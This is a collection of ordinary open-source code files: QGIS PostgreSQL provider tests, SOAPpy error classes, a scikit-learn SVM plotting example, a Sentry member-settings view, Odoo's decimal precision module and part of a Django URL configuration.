        self.assertTrue(self.con)
        cur = self.con.cursor()
        self.assertTrue(cur)
        cur.execute(sql)
        cur.close()
        self.con.commit()
    def enableCompiler(self):
        """Turn on server-side expression compilation for the provider."""
        QgsSettings().setValue('/qgis/compileExpressions', True)
        return True
    def disableCompiler(self):
        """Turn off server-side expression compilation for the provider."""
        QgsSettings().setValue('/qgis/compileExpressions', False)
    def uncompiledFilters(self):
        # Filter expressions the provider cannot compile down to SQL.
        return set(['"dt" = to_datetime(\'000www14ww13ww12www4ww5ww2020\',\'zzzwwwsswwmmwwhhwwwdwwMwwyyyy\')',
                    '"date" = to_date(\'www4ww5ww2020\',\'wwwdwwMwwyyyy\')',
                    '"time" = to_time(\'000www14ww13ww12www\',\'zzzwwwsswwmmwwhhwww\')'])
    def partiallyCompiledFilters(self):
        # No expressions are only partially compiled for this provider.
        return set([])
    def testConstraints(self):
        # The bigint pk column must be resolvable to a field index.
        idx = self.vl.dataProvider().fieldNameIndex("pk")
        self.assertTrue(idx >= 0)
    def testGetFeaturesFidTests(self):
        """Filtering by feature id must return exactly the matching feature."""
        fids = [f.id() for f in self.source.getFeatures()]
        assert len(fids) == 5, 'Expected 5 features, got {} instead'.format(
            len(fids))
        for id in fids:
            features = [f for f in self.source.getFeatures(
                QgsFeatureRequest().setFilterFid(id))]
            self.assertEqual(len(features), 1)
            feature = features[0]
            self.assertTrue(feature.isValid())
            result = [feature.id()]
            expected = [id]
            assert result == expected, 'Expected {} and got {} when testing for feature ID filter'.format(expected,
                                                                                                          result)
            # test that results match QgsFeatureRequest.acceptFeature
            request = QgsFeatureRequest().setFilterFid(id)
            for f in self.source.getFeatures():
                self.assertEqual(request.acceptFeature(f), f.id() == id)
    # TODO: bad features are not tested because the PostgreSQL provider
    # doesn't mark explicitly set invalid features as such.
    def testGetFeatures(self, source=None, extra_features=[], skip_features=[], changed_attributes={},
                        changed_geometries={}):
        """ Test that expected results are returned when fetching all features """
        # NOTE(review): mutable default arguments; benign here since they are
        # only read, never mutated — left unchanged to preserve the signature.
        # IMPORTANT - we do not use `for f in source.getFeatures()` as we are also
        # testing that existing attributes & geometry in f are overwritten correctly
        # (for f in ... uses a new QgsFeature for every iteration)
        if not source:
            source = self.source
        it = source.getFeatures()
        f = QgsFeature()
        attributes = {}
        geometries = {}
        while it.nextFeature(f):
            # expect feature to be valid
            self.assertTrue(f.isValid())
            # some source test datasets will include additional attributes which we ignore,
            # so cherry pick desired attributes
            attrs = [f['pk'], f['cnt'], f['name'], f['name2'], f['num_char']]
            # DON'T force the num_char attribute to be text - some sources (e.g., delimited text) will
            # automatically detect that this attribute contains numbers and set it as a numeric
            # field
            # TODO: PostgreSQL 12 won't accept conversion from integer to text.
            # attrs[4] = str(attrs[4])
            attributes[f['pk']] = attrs
            geometries[f['pk']] = f.hasGeometry() and f.geometry().asWkt()
        expected_attributes = {5: [5, -200, NULL, 'NuLl', '5'],
                               3: [3, 300, 'Pear', 'PEaR', '3'],
                               1: [1, 100, 'Orange', 'oranGe', '1'],
                               2: [2, 200, 'Apple', 'Apple', '2'],
                               4: [4, 400, 'Honey', 'Honey', '4']}
        expected_geometries = {1: 'Point (-70.332 66.33)',
                               2: 'Point (-68.2 70.8)',
                               3: None,
                               4: 'Point(-65.32 78.3)',
                               5: 'Point(-71.123 78.23)'}
        # Apply the caller-supplied deltas to the baseline expectations.
        for f in extra_features:
            expected_attributes[f[0]] = f.attributes()
            if f.hasGeometry():
                expected_geometries[f[0]] = f.geometry().asWkt()
            else:
                expected_geometries[f[0]] = None
        for i in skip_features:
            del expected_attributes[i]
            del expected_geometries[i]
        for i, a in changed_attributes.items():
            for attr_idx, v in a.items():
                expected_attributes[i][attr_idx] = v
        for i, g, in changed_geometries.items():
            if g:
                expected_geometries[i] = g.asWkt()
            else:
                expected_geometries[i] = None
        self.assertEqual(attributes, expected_attributes, 'Expected {}, got {}'.format(
            expected_attributes, attributes))
        self.assertEqual(len(expected_geometries), len(geometries))
        for pk, geom in list(expected_geometries.items()):
            if geom:
                assert compareWkt(geom, geometries[pk]), "Geometry {} mismatch Expected:\n{}\nGot:\n{}\n".format(pk,
                                                                                                                geom,
                                                                                                                geometries[
                                                                                                                    pk])
            else:
                self.assertFalse(
                    geometries[pk], 'Expected null geometry for {}'.format(pk))
    def testAddFeatureExtraAttributes(self):
        if not getattr(self, 'getEditableLayer', None):
            return
        l = self.getEditableLayer()
        self.assertTrue(l.isValid())
        if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
            return
        # test that adding features with too many attributes drops these attributes
        # we be more tricky and also add a valid feature to stress test the provider
        f1 = QgsFeature()
        f1.setAttributes([6, -220, 'qgis', 'String', '15'])
        f2 = QgsFeature()
        f2.setAttributes([7, -230, 'qgis', 'String', '15', 15, 16, 17])
        result, added = l.dataProvider().addFeatures([f1, f2])
        self.assertTrue(result,
                        'Provider returned False to addFeatures with extra attributes. Providers should accept these features but truncate the extra attributes.')
        # make sure feature was added correctly
        added = [f for f in l.dataProvider().getFeatures() if f['pk'] == 7][0]
        # TODO: The PostgreSQL provider doesn't truncate extra attributes!
        self.assertNotEqual(added.attributes(), [7, -230, 'qgis', 'String', '15'],
                            'The PostgreSQL provider doesn\'t truncate extra attributes.')
    def testAddFeatureMissingAttributes(self):
        if not getattr(self, 'getEditableLayer', None):
            return
        l = self.getEditableLayer()
        self.assertTrue(l.isValid())
        if not l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
            return
        # test that adding features with missing attributes pads out these
        # attributes with NULL values to the correct length.
        # changed from ProviderTestBase.testAddFeatureMissingAttributes: we use
        # 'qgis' instead of NULL below.
        # TODO: Only unmentioned attributes get filled with the DEFAULT table
        # value; if the attribute is present, the saved value will be NULL if
        # that is indicated, or the value mentioned by the user; there is no
        # implicit conversion of PyQGIS::NULL to PostgreSQL DEFAULT.
        f1 = QgsFeature()
        f1.setAttributes([6, -220, 'qgis', 'String'])
        f2 = QgsFeature()
        f2.setAttributes([7, 330])
        result, added = l.dataProvider().addFeatures([f1, f2])
        self.assertTrue(result,
                        'Provider returned False to addFeatures with missing attributes. Providers should accept these features but add NULL attributes to the end of the existing attributes to the required field length.')
        f1.setId(added[0].id())
        f2.setId(added[1].id())
        # check result - feature attributes MUST be padded out to required number of fields
        f1.setAttributes([6, -220, 'qgis', 'String', NULL])
        f2.setAttributes([7, 330, 'qgis', 'qgis', NULL])
        self.testGetFeatures(l.dataProvider(), [f1, f2])
    def testAddFeature(self):
        if not getattr(self, 'getEditableLayer', None):
            return
        l = self.getEditableLayer()
        self.assertTrue(l.isValid())
        f1 = QgsFeature()
        # changed from ProviderTestBase.testAddFeature: we use 'qgis' instead
        # of NULL below.
        # TODO: Only unmentioned attributes get filled with the DEFAULT table
        # value; if the attribute is present, the saved value will be NULL if
        # that is indicated, or the value mentioned by the user; there is no
        # implicit conversion of PyQGIS::NULL to PostgreSQL DEFAULT.
        f1.setAttributes([6, -220, 'qgis', 'String', '15'])
        f1.setGeometry(QgsGeometry.fromWkt('Point (-72.345 71.987)'))
        f2 = QgsFeature()
        f2.setAttributes([7, 330, 'Coconut', 'CoCoNut', '13'])
        if l.dataProvider().capabilities() & QgsVectorDataProvider.AddFeatures:
            # expect success
            result, added = l.dataProvider().addFeatures([f1, f2])
            self.assertTrue(
                result, 'Provider reported AddFeatures capability, but returned False to addFeatures')
            f1.setId(added[0].id())
            f2.setId(added[1].id())
            # check result
            self.testGetFeatures(l.dataProvider(), [f1, f2])
            # add empty list, should return true for consistency
            self.assertTrue(l.dataProvider().addFeatures([]))
            # ensure that returned features have been given the correct id
            f = next(l.getFeatures(
                QgsFeatureRequest().setFilterFid(added[0].id())))
            self.assertTrue(f.isValid())
            self.assertEqual(f['cnt'], -220)
            f = next(l.getFeatures(
                QgsFeatureRequest().setFilterFid(added[1].id())))
            self.assertTrue(f.isValid())
            self.assertEqual(f['cnt'], 330)
        else:
            # expect fail
            self.assertFalse(l.dataProvider().addFeatures([f1, f2]),
                             'Provider reported no AddFeatures capability, but returned true to addFeatures')
    def testModifyPk(self):
        """ Check if we can modify a primary key value. Since this PK is bigint, we also exercise the mapping between fid and values """
        vl = self.getEditableLayer()
        self.assertTrue(vl.isValid())
        geomwkt = 'Point(-47.945 -15.812)'
        feature = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk = 4')))
        self.assertTrue(feature.isValid())
        self.assertTrue(vl.startEditing())
        idxpk = vl.fields().lookupField('pk')
        self.assertTrue(vl.dataProvider().changeFeatures({feature.id(): {idxpk: 42}}, {feature.id(): QgsGeometry.fromWkt(geomwkt)}))
        self.assertTrue(vl.commitChanges())
        # read back
        ft = next(vl.getFeatures(QgsFeatureRequest().setFilterExpression('pk = 42')))
        self.assertTrue(ft.isValid())
        self.assertEqual(ft['name'], 'Honey')
        assert compareWkt(ft.geometry().asWkt(), geomwkt), "Geometry mismatch. Expected: {} Got: {}\n".format(ft.geometry().asWkt(), geomwkt)
    def testDuplicatedFieldNamesInQueryLayers(self):
        """Test regresssion GH #36205"""
        vl = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'__rid__\' table="(SELECT row_number() OVER () AS __rid__, * FROM (SELECT * from qgis_test.some_poly_data a, qgis_test.some_poly_data b where ST_Intersects(a.geom,b.geom)) as foo)" sql=', 'test_36205', 'postgres')
        self.assertTrue(vl.isValid())
        self.assertEqual(vl.featureCount(), 3)
        # This fails because the "geom" field and "pk" fields are ambiguous
        # There is no easy fix: all duplicated fields should be explicitly aliased
        # and the query internally rewritten
        # feature = next(vl.getFeatures())
        # self.assertTrue(vl.isValid())
    def testUnrestrictedGeometryType(self):
        """Test geometry column with no explicit geometry type, regression GH #38565"""
        md = QgsProviderRegistry.instance().providerMetadata("postgres")
        conn = md.createConnection(self.dbconn, {})
        # Cleanup if needed
        try:
            conn.dropVectorTable('qgis_test', 'test_unrestricted_geometry')
        except QgsProviderConnectionException:
            pass
        conn.executeSql('''
        CREATE TABLE "qgis_test"."test_unrestricted_geometry" (
            gid serial primary key,
            geom geometry(Geometry, 4326)
        );''')
        # Three layers over the same generic-geometry column, each restricted
        # to one geometry type via the data source URI.
        points = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' srid=4326 type=POINT table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_points', 'postgres')
        lines = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' srid=4326 type=LINESTRING table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_lines', 'postgres')
        polygons = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' srid=4326 type=POLYGON table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_polygons', 'postgres')
        self.assertTrue(points.isValid())
        self.assertTrue(lines.isValid())
        self.assertTrue(polygons.isValid())
        f = QgsFeature(points.fields())
        f.setGeometry(QgsGeometry.fromWkt('point(9 45)'))
        self.assertTrue(points.dataProvider().addFeatures([f]))
        self.assertEqual(points.featureCount(), 1)
        self.assertEqual(lines.featureCount(), 0)
        self.assertEqual(polygons.featureCount(), 0)
        # Fetch from iterator
        self.assertTrue(compareWkt(next(points.getFeatures()).geometry().asWkt(), 'point(9 45)'))
        with self.assertRaises(StopIteration):
            next(lines.getFeatures())
        with self.assertRaises(StopIteration):
            next(polygons.getFeatures())
        f.setGeometry(QgsGeometry.fromWkt('linestring(9 45, 10 46)'))
        self.assertTrue(lines.dataProvider().addFeatures([f]))
        self.assertEqual(points.featureCount(), 1)
        self.assertEqual(lines.featureCount(), 1)
        self.assertEqual(polygons.featureCount(), 0)
        # Fetch from iterator
        self.assertTrue(compareWkt(next(points.getFeatures()).geometry().asWkt(), 'point(9 45)'))
        self.assertTrue(compareWkt(next(lines.getFeatures()).geometry().asWkt(), 'linestring(9 45, 10 46)'))
        with self.assertRaises(StopIteration):
            next(polygons.getFeatures())
        # Test regression GH #38567 (no SRID requested in the data source URI)
        # Cleanup if needed
        conn.executeSql('DELETE FROM "qgis_test"."test_unrestricted_geometry" WHERE \'t\'')
        points = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' type=POINT table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_points', 'postgres')
        lines = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' type=LINESTRING table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_lines', 'postgres')
        polygons = QgsVectorLayer(self.dbconn + ' sslmode=disable key=\'gid\' type=POLYGON table="qgis_test"."test_unrestricted_geometry" (geom) sql=', 'test_polygons', 'postgres')
        self.assertTrue(points.isValid())
        self.assertTrue(lines.isValid())
        self.assertTrue(polygons.isValid())
    def testTrustFlag(self):
        """Test regression https://github.com/qgis/QGIS/issues/38809"""
        vl = QgsVectorLayer(
            self.dbconn +
            ' sslmode=disable key=\'pk\' srid=4326 type=POINT table="qgis_test"."editData" (geom) sql=',
            'testTrustFlag', 'postgres')
        self.assertTrue(vl.isValid())
        p = QgsProject.instance()
        d = QTemporaryDir()
        dir_path = d.path()
        self.assertTrue(p.addMapLayers([vl]))
        project_path = os.path.join(dir_path, 'testTrustFlag.qgs')
        self.assertTrue(p.write(project_path))
        del vl
        p.clear()
        # Round-trip the project: the trust flag defaults to off.
        self.assertTrue(p.read(project_path))
        vl = p.mapLayersByName('testTrustFlag')[0]
        self.assertTrue(vl.isValid())
        self.assertFalse(p.trustLayerMetadata())
        # Set the trust flag
        p.setTrustLayerMetadata(True)
        self.assertTrue(p.write(project_path))
        # Re-read
        p.clear()
        self.assertTrue(p.read(project_path))
        self.assertTrue(p.trustLayerMetadata())
        vl = p.mapLayersByName('testTrustFlag')[0]
        self.assertTrue(vl.isValid())
    def testQueryLayerDuplicatedFields(self):
        """Test that duplicated fields from a query layer are returned"""
        def _get_layer(sql):
            # Wrap *sql* in a query layer keyed on a generated row number.
            return QgsVectorLayer(
                self.dbconn +
                ' sslmode=disable key=\'__rid__\' table=\'(SELECT row_number() OVER () AS __rid__, * FROM (' + sql + ') as foo)\' sql=',
                'test', 'postgres')
        l = _get_layer('SELECT 1, 2')
        self.assertEqual(l.fields().count(), 3)
        self.assertEqual([f.name() for f in l.fields()], ['__rid__', '?column?', '?column? (2)'])
        l = _get_layer('SELECT 1 as id, 2 as id')
        self.assertEqual(l.fields().count(), 3)
        self.assertEqual([f.name() for f in l.fields()], ['__rid__', 'id', 'id (2)'])
# Run the provider test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| gpl-2.0 |
mazaclub/p2pool | SOAPpy/Errors.py | 294 | 3002 | """
################################################################################
#
# SOAPpy - Cayce Ullman (cayce@actzero.com)
# Brian Matthews (blm@actzero.com)
# Gregory Warnes (Gregory.R.Warnes@Pfizer.com)
# Christopher Blunck (blunck@gst.com)
#
################################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
################################################################################
"""
ident = '$Id: Errors.py 921 2005-02-15 16:32:23Z warnes $'
from version import __version__
import exceptions
################################################################################
# Exceptions
################################################################################
class Error(exceptions.Exception):
    """Base class for SOAPpy errors; carries a descriptive message."""

    def __init__(self, msg):
        self.msg = msg

    def __str__(self):
        return "<Error : %s>" % self.msg

    __repr__ = __str__

    def __call__(self):
        # Bug fix: this previously returned the unbound name `msg`, which
        # raised NameError whenever an Error instance was called; return
        # the instance's message as a 1-tuple, mirroring HTTPError below.
        return (self.msg,)
class RecursionError(Error):
    """SOAPpy-specific recursion error."""
    # NOTE(review): on Python 3 this name shadows the builtin
    # RecursionError; this module targets Python 2 (see `import exceptions`).
    pass
class UnknownTypeError(Error):
    """Raised for a type SOAPpy does not know how to handle — presumably
    during (de)serialization; confirm against call sites."""
    pass
class HTTPError(Error):
    """Indicates an HTTP protocol error, carrying the status code and
    reason message."""

    def __init__(self, code, msg):
        self.code = code
        self.msg = msg

    def __str__(self):
        return "<HTTPError %s %s>" % (self.code, self.msg)

    __repr__ = __str__

    def __call__(self):
        # Bug fix: the method was misspelled `__call___` (three trailing
        # underscores), so it never hooked the call protocol and calling
        # an HTTPError instance raised TypeError instead of returning
        # the (code, msg) pair.
        return (self.code, self.msg, )
class UnderflowError(exceptions.ArithmeticError):
    """Arithmetic underflow; note it derives from ArithmeticError, not
    from this module's Error base."""
    pass
| gpl-3.0 |
jmetzen/scikit-learn | examples/svm/plot_iris.py | 225 | 3252 | """
==================================================
Plot different SVM classifiers in the iris dataset
==================================================
Comparison of different linear SVM classifiers on a 2D projection of the iris
dataset. We only consider the first 2 features of this dataset:
- Sepal length
- Sepal width
This example shows how to plot the decision surface for four SVM classifiers
with different kernels.
The linear models ``LinearSVC()`` and ``SVC(kernel='linear')`` yield slightly
different decision boundaries. This can be a consequence of the following
differences:
- ``LinearSVC`` minimizes the squared hinge loss while ``SVC`` minimizes the
regular hinge loss.
- ``LinearSVC`` uses the One-vs-All (also known as One-vs-Rest) multiclass
reduction while ``SVC`` uses the One-vs-One multiclass reduction.
Both linear models have linear decision boundaries (intersecting hyperplanes)
while the non-linear kernel models (polynomial or Gaussian RBF) have more
flexible non-linear decision boundaries with shapes that depend on the kind of
kernel and its parameters.
.. NOTE:: while plotting the decision function of classifiers for toy 2D
datasets can help get an intuitive understanding of their respective
expressive power, be aware that those intuitions don't always generalize to
more realistic high-dimensional problems.
"""
# Echo the module docstring (the example's description) when run.
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets
# import some data to play with
iris = datasets.load_iris()
X = iris.data[:, :2]  # we only take the first two features. We could
# avoid this ugly slicing by using a two-dim dataset
y = iris.target
h = .02  # step size in the mesh
# we create an instance of SVM and fit out data. We do not scale our
# data since we want to plot the support vectors
C = 1.0  # SVM regularization parameter
svc = svm.SVC(kernel='linear', C=C).fit(X, y)
rbf_svc = svm.SVC(kernel='rbf', gamma=0.7, C=C).fit(X, y)
poly_svc = svm.SVC(kernel='poly', degree=3, C=C).fit(X, y)
lin_svc = svm.LinearSVC(C=C).fit(X, y)
# create a mesh to plot in
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
                     np.arange(y_min, y_max, h))
# title for the plots
# (order matches the classifier tuple iterated below)
titles = ['SVC with linear kernel',
          'LinearSVC (linear kernel)',
          'SVC with RBF kernel',
          'SVC with polynomial (degree 3) kernel']
for i, clf in enumerate((svc, lin_svc, rbf_svc, poly_svc)):
    # Plot the decision boundary. For that, we will assign a color to each
    # point in the mesh [x_min, m_max]x[y_min, y_max].
    plt.subplot(2, 2, i + 1)
    plt.subplots_adjust(wspace=0.4, hspace=0.4)
    Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
    # Put the result into a color plot
    Z = Z.reshape(xx.shape)
    plt.contourf(xx, yy, Z, cmap=plt.cm.Paired, alpha=0.8)
    # Plot also the training points
    plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Paired)
    plt.xlabel('Sepal length')
    plt.ylabel('Sepal width')
    plt.xlim(xx.min(), xx.max())
    plt.ylim(yy.min(), yy.max())
    plt.xticks(())
    plt.yticks(())
    plt.title(titles[i])
plt.show()
| bsd-3-clause |
fotinakis/sentry | src/sentry/web/frontend/organization_member_settings.py | 6 | 4160 | from __future__ import absolute_import
from django.contrib import messages
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.utils.translation import ugettext_lazy as _, ugettext
from sentry import roles
from sentry.models import OrganizationMember, OrganizationMemberTeam, \
Team, TeamStatus
from sentry.utils import auth
from sentry.web.frontend.base import OrganizationView
from sentry.web.forms.edit_organization_member import EditOrganizationMemberForm
class OrganizationMemberSettingsView(OrganizationView):
    """View for a single organization member: edit role and team
    membership, or (for pending members) resend/regenerate the invite."""
    def get_form(self, request, member, all_teams, allowed_roles):
        # Bound form on POST, unbound otherwise; initial values mirror the
        # member's current role and team assignments.
        return EditOrganizationMemberForm(
            data=request.POST or None,
            instance=member,
            all_teams=all_teams,
            allowed_roles=allowed_roles,
            initial={
                'role': member.role,
                'teams': Team.objects.filter(
                    id__in=OrganizationMemberTeam.objects.filter(
                        organizationmember=member,
                    ).values('team'),
                ),
            },
        )
    def resend_invite(self, request, organization, member, regen=False):
        """Send (or, with ``regen``, regenerate then send) the member's
        invite email and redirect back to the member settings page."""
        if regen:
            # A new token invalidates the previously issued invite link.
            member.update(token=member.generate_token())
            messages.success(request, ugettext('A new invitation has been generated and sent to %(email)s') % {
                'organization': organization.name,
                'email': member.email,
            })
        else:
            messages.success(request, ugettext('An invitation to join %(organization)s has been sent to %(email)s') % {
                'organization': organization.name,
                'email': member.email,
            })
        member.send_invite_email()
        redirect = reverse('sentry-organization-member-settings',
                           args=[organization.slug, member.id])
        return self.redirect(redirect)
    def view_member(self, request, organization, member, all_teams):
        # Read-only detail page, used when the requester cannot administer
        # this member (or is looking at their own membership).
        context = {
            'member': member,
            'enabled_teams': set(member.teams.all()),
            'all_teams': all_teams,
            'role_list': roles.get_all(),
        }
        return self.respond('sentry/organization-member-details.html', context)
    def handle(self, request, organization, member_id):
        """Entry point: resolve the member, dispatch reinvite/regenerate
        actions, then render either the read-only page or the edit form."""
        try:
            # Match either an active user or a pending invite (no user yet).
            member = OrganizationMember.objects.get(
                Q(user__is_active=True) | Q(user__isnull=True),
                organization=organization,
                id=member_id,
            )
        except OrganizationMember.DoesNotExist:
            return self.redirect(auth.get_login_url())
        if request.POST.get('op') == 'reinvite' and member.is_pending:
            return self.resend_invite(request, organization, member)
        elif request.POST.get('op') == 'regenerate' and member.is_pending:
            return self.resend_invite(request, organization, member, regen=True)
        can_admin, allowed_roles = self.get_allowed_roles(request, organization, member)
        all_teams = Team.objects.filter(
            organization=organization,
            status=TeamStatus.VISIBLE
        )
        # Members may not edit themselves through this view, and only
        # users allowed to administer this member see the edit form.
        if member.user == request.user or not can_admin:
            return self.view_member(request, organization, member, all_teams)
        form = self.get_form(request, member, all_teams, allowed_roles)
        if form.is_valid():
            member = form.save(request.user, organization, request.META['REMOTE_ADDR'])
            messages.add_message(request, messages.SUCCESS,
                                 _('Your changes were saved.'))
            redirect = reverse('sentry-organization-member-settings',
                               args=[organization.slug, member.id])
            return self.redirect(redirect)
        context = {
            'member': member,
            'form': form,
            'invite_link': member.get_invite_link(),
            'role_list': [
                (r, r in allowed_roles)
                for r in roles.get_all()
            ],
            'all_teams': all_teams
        }
        return self.respond('sentry/organization-member-settings.html', context)
| bsd-3-clause |
CXQERP/ODOOERP | addons/decimal_precision/decimal_precision.py | 233 | 3728 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import SUPERUSER_ID
from openerp import tools
from openerp.osv import orm, fields
from openerp.modules.registry import RegistryManager
class decimal_precision(orm.Model):
    """Per-usage configuration of how many decimal digits float fields
    carry; looked up through get_precision() below."""
    _name = 'decimal.precision'
    _columns = {
        'name': fields.char('Usage', select=True, required=True),
        'digits': fields.integer('Digits', required=True),
    }
    _defaults = {
        'digits': 2,
    }
    _sql_constraints = [
        ('name_uniq', 'unique (name)', """Only one value can be defined for each given usage!"""),
    ]
    # Result is cached; skiparg=3 keeps cr/uid out of the cache key so the
    # cache is keyed on the application name only.
    @tools.ormcache(skiparg=3)
    def precision_get(self, cr, uid, application):
        """Return the digit count configured for *application* (2 if unset)."""
        cr.execute('select digits from decimal_precision where name=%s', (application,))
        res = cr.fetchone()
        return res[0] if res else 2
    def clear_cache(self, cr):
        """clear cache and update models. Notify other workers to restart their registry."""
        self.precision_get.clear_cache(self)
        RegistryManager.signal_registry_change(cr.dbname)
    def create(self, cr, uid, data, context=None):
        # Any CRUD change may alter a configured precision -> drop the cache.
        res = super(decimal_precision, self).create(cr, uid, data, context=context)
        self.clear_cache(cr)
        return res
    def unlink(self, cr, uid, ids, context=None):
        res = super(decimal_precision, self).unlink(cr, uid, ids, context=context)
        self.clear_cache(cr)
        return res
    def write(self, cr, uid, ids, data, *args, **argv):
        res = super(decimal_precision, self).write(cr, uid, ids, data, *args, **argv)
        self.clear_cache(cr)
        return res
def get_precision(application):
    """Return a callable usable as the ``digits`` argument of a float field.

    The returned callable defers the lookup until field setup time, so the
    precision configured for *application* is read from the current database
    registry rather than being frozen at import time.
    """
    def change_digit(cr):
        # 16 is the fixed total width OpenERP uses for floats; only the
        # decimal part is configurable per usage.
        registry = openerp.registry(cr.dbname)
        digits = registry['decimal.precision'].precision_get(
            cr, SUPERUSER_ID, application)
        return (16, digits)
    return change_digit
class DecimalPrecisionFloat(orm.AbstractModel):
    """ Override qweb.field.float to add a `decimal_precision` domain option
    and use that instead of the column's own value if it is specified
    """
    _inherit = 'ir.qweb.field.float'

    def precision(self, cr, uid, field, options=None, context=None):
        # Guard clause: without a decimal_precision option, defer entirely
        # to the column's own precision.
        usage = options.get('decimal_precision') if options else None
        if not usage:
            return super(DecimalPrecisionFloat, self).precision(
                cr, uid, field, options=options, context=context)
        return self.pool['decimal.precision'].precision_get(cr, uid, usage)
class DecimalPrecisionTestModel(orm.Model):
    # Minimal model used by the test suite to exercise float precision:
    # one float with default digits plus fixed 2- and 4-digit variants.
    _name = 'decimal.precision.test'
    _columns = {
        'float': fields.float(),
        'float_2': fields.float(digits=(16, 2)),
        'float_4': fields.float(digits=(16, 4)),
    }
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
janekg89/flutype_webapp | flutype/urls.py | 1 | 4288 | from django.conf.urls import url
from django.contrib import admin
from django.conf.urls import url, include
from . import views
# URL routes for the flutype web app.
# Fix: the 'studies/new/' route (name='study_new') was registered twice;
# the redundant second entry has been removed — Django resolves the first
# matching pattern, so the duplicate was unreachable and reverse('study_new')
# is unaffected.
urlpatterns = [
    # Landing page and admin.
    url(r'^$', views.studies_view, name='index'),
    url(r'^admin/', include(admin.site.urls), name='admin'),

    # Studies.
    url(r'^mystudies/$', views.my_studies_view, name='my_studies'),
    url(r'^uploadfile_study/(?P<sid>.*)/$', views.upload_file_study, name='upload_file_study'),
    url(r'^study/(?P<sid>.*)/$', views.study_view, name='study'),
    url(r'^study/(?P<pk>.*)/edit$', views.study_edit, name='study_edit'),
    url(r'^study/(?P<sid>.*)/import_measurement$', views.import_measurement_view, name='import_measurement'),
    url(r'^studies/new/$', views.study_new, name='study_new'),
    url(r'^study_ligands/(?P<sid>.*)/$', views.study_ligands_view, name='study_ligands'),

    # Help pages.
    url(r'^tutorial_db/$', views.tutorial_db_view, name='tutorial_db'),
    url(r'^glossary/$', views.glossary_view, name='glossary'),

    # Measurements and their results.
    url(r'^measurements/$', views.measurements_view, name='measurements'),
    url(r'^mymeasurements/$', views.my_measurements_view, name='my_measurements'),
    url(r'^measurement/(?P<sid>.*)/$', views.measurement_view, name='rawspotcollectionview'),
    url(r'^measurement_ligands/(?P<sid>.*)/$', views.measurement_ligands_view, name='measurement_ligands'),
    url(r'^m/(?P<measurement_sid>.*)/result/(?P<sid>.*)/$', views.measurement_result_view, name='qspotcollectionview'),
    url(r'^m/(?P<measurement_sid>.*)/result/(?P<sid>.*)/data$', views.barplot_data_view, name='barplot_plotly1'),
    url(r'^m/(?P<measurement_sid>.*)/result/(?P<sid>.*)/data2$', views.barplot2_data_view, name='barplot_plotly2'),
    url(r'^m/(?P<measurement_sid>.*)/result/(?P<sid>.*)/barplot_p$', views.highcharts_view, name='heatmap_highchart1'),
    url(r'^uploadfile_measurement/(?P<sid>.*)/$', views.upload_file_measurement, name='upload_file_measurement'),

    # Users and informational pages.
    url(r'^users/$', views.users_view, name='users'),
    url(r'^about/$', views.about_en_view, name='about'),
